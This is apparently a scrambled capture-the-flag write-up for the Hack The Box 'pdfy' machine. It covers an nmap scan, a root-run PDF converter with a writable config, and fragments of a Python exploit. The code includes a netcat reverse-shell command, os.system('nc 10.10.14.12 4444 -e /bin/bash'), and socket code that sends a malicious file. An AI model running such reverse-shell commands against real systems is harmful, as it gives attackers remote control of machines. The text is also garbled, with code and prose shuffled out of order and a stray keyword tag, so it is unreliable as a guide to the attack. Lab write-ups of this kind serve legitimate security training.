# Close the socket s.close()
Upon further examination, we find that the pdfy-converter service runs as the root user and uses a configuration file located at /etc/pdfy-converter/config.json . We also notice that the configuration file has weak permissions, allowing the pdfy user to modify its contents.
nmap -sC -sV -oA initial_scan 10.10.11.232 The scan results reveal that the machine is running a web server on port 80, an SSH server on port 22, and a PDF converter service on port 8080. We also notice that the machine has a firewall configured, but it seems to be allowing incoming traffic on port 80. pdfy htb writeup upd
As the pdfy user, we examine the user's groups and privileges. We notice that the user is a member of the pdfy group and has read/write access to the /var/www/pdfy directory. However, we also discover that the user has limited privileges and cannot execute system commands.
# Establish a reverse shell os.system('nc 10.10.14.12 4444 -e /bin/bash') After executing the exploit, we gain a reverse shell as the user pdfy . We then proceed to explore the machine and gather more information about the user and its privileges. # Close the socket s
# Receive the response response = s.recv(1024)
import socket import os
# Send the malicious file s.send(malicious_file.encode())